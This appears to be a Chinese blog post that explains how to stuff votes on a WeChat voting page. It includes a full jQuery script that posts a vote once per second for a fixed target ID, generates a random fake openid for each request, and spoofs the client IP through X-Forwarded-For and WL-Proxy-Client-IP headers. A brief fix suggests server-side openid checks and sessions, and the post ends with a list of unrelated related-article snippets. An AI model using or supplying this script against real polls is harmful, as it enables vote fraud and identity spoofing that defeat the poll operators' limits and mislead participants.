1.直接电脑使用谷歌浏览器进去朋友的投票页面，f12查看页面内容

其实在页面上手动随意修改上图中openid，即可肆意不限制投票。但这样操作太麻烦了，可以看下js源码

上图可以看出，其实只要openid,和toopenid即可，openid是自己的微信id，toopenid是投票对象的微信id,那我们定时修改openid即可给某一个人刷投票

下面贴代码

    //执行脚本function init(){initIp();}//定时操作，每秒执行一次function demo(){ setInterval("init()",1000);}//随机生成以ovgMdt开头的27位微信openid（字母大小写+数字）function createNum(){var str = "ovgMdt",range = 21,arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];// 随机产生for(var i=0; i<range; i++){pos = Math.round(Math.random() * (arr.length-1));str += arr[pos];}return str;}//提交请求function initIp(){var ip=createIp();var num=createNum();var $toopenid='ovgMdtSysi89sfInf0pdfg5T';var submitData = {toopenid: $toopenid,openid: num};$.ajax({headers:{'x-forwarded-for':ip,'WL-Proxy-Client-IP':ip},type: "POST",url: "xxxxxxxxxxxxxx",data: submitData,dataType: "json",beforeSend: function () {},success: function (data) {if (data.code == 0) {$("#"+$toopenid).text(data.vote);if(data.today_vote >= 2){$(".vote").addClass("red");}$("#"+$toopenid).parent().find(".plus").css({"top":"186px","opacity":0});$("#"+$toopenid).parent().find(".plus").stop().animate({"top":"176px","opacity":1},300,"swing").animate({"opacity":0},100);} else {alert(data.msg);}}});}//生成随机的ip地址function createIp() {var a = Math.round(Math.random() * 250) + 1,b = Math.round(Math.random() * 250) + 1,c = Math.round(Math.random() * 240) + 1,d = Math.round(Math.random() * 240) + 1;return [a, b, c, d].join('.');}

如果只是IP限制，那就更好办了，伪造一个IP也是一个原理，JS开个定时任务，刷，刷，刷。

解决方案

本安全中，投票提交的动作没有加验证，所以才会被无限刷票。其实只要加一个小小的限制就可以解决这样的问题，比如在提交前收集到用户信息提交到数据库，投票的时候查下这个OPENID是否在数据库中存在即可。登录成功后也存下SESSION，这样就不会随意被刷了。

一代JS代码可以搞定机器自动刷票，投票页数据验证很重要相关推荐

3行代码，搞定AI自动抠图
点击上方"GitPython",选择"星标"公众号重磅干货,第一时间送达抠图是用PS? 用魔棒和快速选择工具? 遇到复杂背景怎么办? 最近发现一个神奇的工具 ...
RPA「C位」卷王，5行代码搞定订单自动发货！
技术的魅力在于它充满未知的惊喜,并且值得你持续探索下去. 基于"打造一款人人可用的RPA"的初心,影刀PRA凭借自身的"好用且易用"的特性赢得了一大批用户的喜爱 ...
[JavaScript]只需一行代码,轻松搞定快捷留言-V2升级版
前天熬了大半宿发了一篇[一行代码轻松搞定快捷留言功能],同时发布了V1.0beta版的快捷留言功能和源代码,之所以是beta版,就是当时感觉虽然基本功能有了,但是还不够完善,特性也不一定合理,今天不知 ...
网站被恶意镜像怎么办 php一段代码轻松搞定（全面版）
有时候你会发现,你在搜索引擎输入网站名称的时候,出来的网站信息是你们的,但是域名却是一个陌生的,这种情况可以基本确定网站被镜像了,那么究竟什么叫网站被镜像? 恶意镜像,也叫恶意克隆,恶意解析,是指有人 ...
html 简繁文件转换器,几行代码轻松搞定网页的简繁转换
几行代码轻松搞定网页的简繁转换以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 对网页进行简繁字体转换的方法一般有两种 ...
php镜像网页,网站被恶意镜像怎么办 php一段代码轻松搞定（全面版）
有时候你会发现,你在搜索引擎输入网站名称的时候,出来的网站信息是你们的,但是域名却是一个陌生的,这种情况可以基本确定网站被镜像了,那么究竟什么叫网站被镜像? 恶意镜像,也叫恶意克隆,恶意解析,是指有人 ...
一行代码快速搞定Flowable断点下载（下）
一行代码快速搞定Flowable断点下载(下) 其实这个主题对应的三篇文章真的真的非常难写,首先是感觉非常多人对于函数式编程不太熟悉,然后又有一些人对于kotlin不太熟悉.这就导致了,写这三篇文章的 ...
一款好用的JS插件xm-select【只需要引用一个JS文件就搞定】
一款好用的JS插件xm-select[只需要引用一个JS文件就搞定] 先上js代码:复制保存直接用 !function(e){var t={};function n(o){if(t[o])return ...
python爬取豆瓣读书简单_Python用16行代码就搞定了爬取豆瓣读书页面
点击蓝字"python教程"关注我们哟! 我们一直说Python比较简单,代码体量没有别的程序那么大,对于初学者,尤其是零编程基础的初学者来说,感触没有那么明显,那么今天就让你见识 ...
python爬取豆瓣读书简单_Python用16行代码就搞定了爬取豆瓣读书页面！
我们一直说Python比较简单,代码体量没有别的程序那么大,对于初学者,尤其是零编程基础的初学者来说,感触没有那么明显,那么今天就让你见识一下:爬取豆瓣读书页面,Python用16行代码就搞定了! p ...

一代JS代码可以搞定机器自动刷票，投票页数据验证很重要

解决方案

一代JS代码可以搞定机器自动刷票，投票页数据验证很重要相关推荐

最新文章

热门文章